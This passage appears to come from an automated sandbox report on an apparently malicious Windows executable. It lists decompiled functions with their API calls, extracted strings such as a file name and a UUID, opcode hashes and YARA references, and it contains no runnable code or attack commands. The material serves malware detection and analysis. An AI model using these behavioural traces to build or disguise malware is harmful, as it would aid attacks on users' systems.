                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2560635915-0
                                                                                                                                                                                                      • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0043B6FF, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                                                      • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041F070, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041E500, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041FA40, Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PostThreadMessageW.USER32 ref: 0041FA53
                                                                                                                                                                                                      • PeekMessageW.USER32 ref: 0041FA71
                                                                                                                                                                                                      • DispatchMessageW.USER32 ref: 0041FA7B
                                                                                                                                                                                                      • PeekMessageW.USER32 ref: 0041FA89
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                      • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041FDF0, Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PostThreadMessageW.USER32 ref: 0041FE03
                                                                                                                                                                                                      • PeekMessageW.USER32 ref: 0041FE21
                                                                                                                                                                                                      • DispatchMessageW.USER32 ref: 0041FE2B
                                                                                                                                                                                                      • PeekMessageW.USER32 ref: 0041FE39
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                      • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00417BA0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                                                                      • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00414160, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0045AD50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                                                                                      • API String ID: 2102423945-2013712220
                                                                                                                                                                                                      • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                      • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C5C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StringUuid$CreateFree
                                                                                                                                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                                                      • API String ID: 3044360575-2335240114
                                                                                                                                                                                                      • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00437A2D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscmp
                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                      • API String ID: 856254489-711371036
                                                                                                                                                                                                      • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                                                                      • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 29327785-2616962270
                                                                                                                                                                                                      • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00423B4C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                                                      • String ID: bad allocation
                                                                                                                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                                                                                                                      • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                                                                                                                      • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041BA10, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                      • RegisterClassExW.USER32 ref: 0041BA73
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                      • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                                                      • API String ID: 1693014935-1496217519
                                                                                                                                                                                                      • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                      • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C420, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 610490371-2616962270
                                                                                                                                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00427C2E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00427C31
                                                                                                                                                                                                        • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
                                                                                                                                                                                                        • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82
                                                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 00427C39
                                                                                                                                                                                                        • Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
                                                                                                                                                                                                        • Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE
                                                                                                                                                                                                        • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                                                                                                                                      • _doexit.LIBCMT ref: 00427C50
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
                                                                                                                                                                                                      • String ID: i;B
                                                                                                                                                                                                      • API String ID: 2447380256-472376889
                                                                                                                                                                                                      • Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                                                                                                                                      • Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040ECB0, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove_strtok
                                                                                                                                                                                                      • String ID:
